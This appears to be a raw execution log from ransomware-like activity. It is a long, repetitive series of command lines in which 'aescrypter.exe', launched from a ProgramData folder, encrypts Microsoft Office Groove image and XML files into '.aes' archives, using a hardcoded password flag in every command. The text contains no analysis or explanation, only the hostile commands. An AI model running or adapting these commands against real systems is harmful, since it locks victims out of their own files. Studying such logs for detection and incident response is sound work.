"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOff.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileOffMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_HighMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Off.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_OffMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageMaskSmall.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImageSmall.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMaskSmall.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\MessageBoxIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\DocumentShare\WSSFilesToolHomePageBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\ActiveTabImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\BodyPaneBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\MarkupIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\Attachments.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CHECKBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CURRENCY.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DATETIME.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\EmbeddedView.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\IMAGE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LINE.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\LISTBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\NUMERIC.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\RADIO.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\SectionHeading.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\StaticText.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTBOX.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\UnformattedNumeric.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\GrooveFormsMetaData.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\ViewHeaderPreview.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\AddToViewArrowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIcons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

